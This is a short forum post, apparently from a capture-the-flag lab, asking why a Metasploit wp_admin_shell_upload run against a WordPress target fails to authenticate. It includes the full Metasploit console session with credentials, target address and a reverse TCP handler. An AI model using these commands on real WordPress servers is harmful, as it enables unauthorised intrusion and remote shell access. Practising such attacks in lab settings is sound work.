Hi all: I’m stuck with that machine.
I am not able to login in the wordpress server, neither via web nor using metasploit:
msf5 exploit(unix/webapp/wp_admin_shell_upload) > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
PASSWORD => P@s5w0rd!
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.10.10.29
RHOSTS => 10.10.10.29
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run
[] Started reverse TCP handler on 10.10.14.196:4444
[] Authenticating with WordPress using admin:P@s5w0rd!..
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
I know that the user exists, because I can try to ‘recover password’ and it doesn’t fail, but the password seems to be wrong.
What am I doing wrong?